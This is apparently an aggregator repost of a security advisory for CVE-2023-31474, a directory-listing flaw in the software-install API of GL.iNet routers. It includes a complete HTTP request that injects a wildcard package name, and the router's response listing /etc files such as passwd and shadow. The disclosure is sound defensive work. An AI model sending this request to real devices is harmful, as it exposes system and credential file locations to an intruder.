Headline

CVE-2023-31474: CVE-issues/Directory_Listing.md at main · gl-inet/CVE-issues

An issue was discovered on GL.iNet devices before 3.216. Through the software installation feature, it is possible to inject arbitrary parameters in a request to cause opkg to obtain a list of files in a specific directory, by using the regex feature in a package name.

1 year ago

CVE

Open in Source

#web #windows #apple #js #java #samba #auth #chrome #webkit

Through the software installation feature, it is possible to inject arbitrary parameters in the request so as to exploit opkg to get the list of files in a specific directory, using the regex feature in package name.

Request:

POST /cgi-bin/api/software/install HTTP/1.1
Host: 192.168.8.1
Content-Length: 11
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Authorization: ce0fc001ff684088a83257360de4bb44
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.8.1
Referer: http://192.168.8.1/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Admin-Token=ce0fc001ff684088a83257360de4bb44
Connection: close

name=/etc/*

Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 8221
Connection: close
Date: Sun, 19 Mar 2023 08:31:23 GMT
Server: lighttpd/1.4.48

{"code":-13,"stderr":"Collected errors:\n * opkg_install_cmd: Cannot install package \/etc\/TZ.\n * opkg_install_cmd: Cannot install package \/etc\/Visible_profile.\n * opkg_install_cmd: Cannot install package \/etc\/banner.\n * opkg_install_cmd: Cannot install package \/etc\/banner.failsafe.\n * opkg_install_cmd: Cannot install package \/etc\/board.d.\n * opkg_install_cmd: Cannot install package \/etc\/board.json.\n * opkg_install_cmd: Cannot install package \/etc\/chatscripts.\n * opkg_install_cmd: Cannot install package \/etc\/config.\n * opkg_install_cmd: Cannot install package \/etc\/crontabs.\n * opkg_install_cmd: Cannot install package \/etc\/ddns.\n * opkg_install_cmd: Cannot install package \/etc\/device_info.\n * opkg_install_cmd: Cannot install package \/etc\/diag.sh.\n * opkg_install_cmd: Cannot install package \/etc\/dnsmasq.conf.\n * opkg_install_cmd: Cannot install package \/etc\/dropbear.\n * opkg_install_cmd: Cannot install package \/etc\/ethers.\n * opkg_install_cmd: Cannot install package \/etc\/ethertypes.\n * opkg_install_cmd: Cannot install package \/etc\/filesystems.\n * opkg_install_cmd: Cannot install package \/etc\/firewall.nat6.\n * opkg_install_cmd: Cannot install package \/etc\/firewall.user.\n * opkg_install_cmd: Cannot install package \/etc\/forward.\n * opkg_install_cmd: Cannot install package \/etc\/fstab.\n * opkg_install_cmd: Cannot install package \/etc\/fw_env.config.\n * opkg_install_cmd: Cannot install package \/etc\/gcom.\n * opkg_install_cmd: Cannot install package \/etc\/glversion.\n * opkg_install_cmd: Cannot install package \/etc\/group.\n * opkg_install_cmd: Cannot install package \/etc\/hosts.\n * opkg_install_cmd: Cannot install package \/etc\/hotplug-preinit.json.\n * opkg_install_cmd: Cannot install package \/etc\/hotplug.d.\n * opkg_install_cmd: Cannot install package \/etc\/hotplug.json.\n * opkg_install_cmd: Cannot install package \/etc\/init.d.\n * opkg_install_cmd: Cannot install package \/etc\/inittab.\n * opkg_install_cmd: Cannot install package \/etc\/ip-up.d.\n * opkg_install_cmd: Cannot install package \/etc\/iproute2.\n * opkg_install_cmd: Cannot install package \/etc\/lighttpd.\n * opkg_install_cmd: Cannot install package \/etc\/localtime.\n * opkg_install_cmd: Cannot install package \/etc\/lockdown.\n * opkg_install_cmd: Cannot install package \/etc\/log.\n * opkg_install_cmd: Cannot install package \/etc\/modules-boot.d.\n * opkg_install_cmd: Cannot install package \/etc\/modules.d.\n * opkg_install_cmd: Cannot install package \/etc\/mtab.\n * opkg_install_cmd: Cannot install package \/etc\/mwan3.user.\n * opkg_install_cmd: Cannot install package \/etc\/nodogsplash.\n * opkg_install_cmd: Cannot install package \/etc\/openvpn.\n * opkg_install_cmd: Cannot install package \/etc\/openvpn.user.\n * opkg_install_cmd: Cannot install package \/etc\/openwrt_release.\n * opkg_install_cmd: Cannot install package \/etc\/openwrt_version.\n * opkg_install_cmd: Cannot install package \/etc\/opkg.\n * opkg_install_cmd: Cannot install package \/etc\/opkg.conf.\n * opkg_install_cmd: Cannot install package \/etc\/os-release.\n * opkg_install_cmd: Cannot install package \/etc\/passwd.\n * opkg_install_cmd: Cannot install package \/etc\/passwd-.\n * opkg_install_cmd: Cannot install package \/etc\/ppp.\n * opkg_install_cmd: Cannot install package \/etc\/preinit.\n * opkg_install_cmd: Cannot install package \/etc\/profile.\n * opkg_install_cmd: Cannot install package \/etc\/protocols.\n * opkg_install_cmd: Cannot install package \/etc\/rc.button.\n * opkg_install_cmd: Cannot install package \/etc\/rc.common.\n * opkg_install_cmd: Cannot install package \/etc\/rc.d.\n * opkg_install_cmd: Cannot install package \/etc\/rc.local.\n * opkg_install_cmd: Cannot install package \/etc\/resolv.conf.\n * opkg_install_cmd: Cannot install package \/etc\/route_policy.\n * opkg_install_cmd: Cannot install package \/etc\/samba.\n * opkg_install_cmd: Cannot install package \/etc\/services.\n * opkg_install_cmd: Cannot install package \/etc\/shadow.\n * opkg_install_cmd: Cannot install package \/etc\/shadow-.\n * "}

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

11 months ago

11 months ago

11 months ago

11 months ago

11 months ago